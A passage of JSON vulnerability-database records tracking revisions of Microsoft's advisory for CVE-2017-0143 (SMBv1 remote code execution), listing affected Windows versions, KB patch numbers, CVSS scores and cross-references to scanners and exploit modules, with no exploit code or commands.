"KB3213986", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", 
"kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit 
systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T14:49:48", "differentElements": ["msAffectedSoftware"], "edition": 63}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T16:52:15", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012216", "KB4012213", "KB4012215", "KB4013198", "KB4012212", "KB3205409", "KB3213986", "KBMS16-110, 3187754", "KB4013429", "KB3210720", "KB4012214", "KB3212646", "KB4012598", "KB4012217", "KB3210721", "KB3177186", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T16:52:15", "differentElements": ["msAffectedSoftware"], "edition": 64}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T18:49:52", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
